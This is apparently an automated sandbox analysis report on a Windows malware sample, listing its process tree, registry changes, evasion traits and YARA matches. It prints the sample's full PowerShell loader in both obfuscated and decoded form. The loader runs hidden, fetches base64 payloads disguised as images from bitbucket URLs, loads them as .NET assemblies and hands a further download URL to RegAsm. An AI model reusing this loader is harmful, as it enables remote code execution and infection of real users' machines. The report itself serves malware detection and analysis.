        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFFC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbbert\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSI:Syf source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFFC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
Source: 0XVZC3kfwL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 0XVZC3kfwL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 0XVZC3kfwL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 0XVZC3kfwL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 0XVZC3kfwL.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C#
#J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcub
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la'
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwB
l#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
Source: 0XVZC3kfwL.exe | Static PE information: 0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C21D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree, 0_2_00007FF681C21D10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFB4ADF0DD0 pushad ; retf 5_2_00007FFB4ADF0E0D

        Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C215F4 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA, 0_2_00007FF681C215F4
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1556
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1715
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4992
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4355
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Check user administrative privileges: GetTokenInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676 | Thread sleep count: 1556 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676 | Thread sleep count: 1715 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4508 | Thread sleep count: 92 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 964 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5628 | Thread sleep count: 4992 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5628 | Thread sleep count: 4355 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776 | Thread sleep time: -11990383647911201s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5364 | Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5724 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C22034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA | 0_2_00007FF681C22034
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C26710 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA | 0_2_00007FF681C26710
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: powershell.exe, 00000005.00000002.1546060009.000001EEDDF88000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C21D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree | 0_2_00007FF681C21D10
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C28714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_00007FF681C28714
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C28A1E SetUnhandledExceptionFilter | 0_2_00007FF681C28A1E

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match | File source: amsi64_6592.amsi.csv, type: OTHER
        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4640, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTR
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwB
l#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
